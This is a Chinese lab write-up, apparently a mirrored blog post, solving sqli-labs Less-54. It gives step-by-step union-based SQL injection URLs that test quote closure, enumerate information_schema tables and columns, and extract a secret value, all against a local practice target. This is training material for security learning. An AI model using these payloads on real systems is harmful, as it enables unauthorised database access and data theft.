zoukankan      html  css  js  c++  java
  • 【sqli-labs】 less54 GET -Challenge -Union -10 queries allowed -Variation1 (GET型 挑战 联合查询 只允许10次查询 变化1)

    尝试的次数只有10次

    http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=1'

    单引号报错,错误信息没有显示

    加注释符页面恢复正常,判断为单引号闭合

    http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=1'%23

    通过页面信息可以判断查询的表至少有id,username,password三个字段,所以union select至少应该select3个字段

    http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0' union select 1,user(),database()%23

    用group_concat函数连接所有表名

    http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23

    只有一张表,查列名

    http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='13KLHT1VHR'%23

    查询数据

    http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0' union select 1,secret_R03R,tryy from 13KLHT1VHR limit 0,1%23

    提交

    成功

  • 相关阅读:
    【Codechef】Chef and Bike(二维多项式插值)
    USACO 完结的一些感想
    USACO 6.5 Checker Challenge
    USACO 6.5 The Clocks
    USACO 6.5 Betsy's Tour (插头dp)
    USACO 6.5 Closed Fences
    USACO 6.4 Electric Fences
    USACO 6.5 All Latin Squares
    USACO 6.4 The Primes
    USACO 6.4 Wisconsin Squares
  • 原文地址:https://www.cnblogs.com/omnis/p/8393232.html
Copyright © 2011-2022 走看看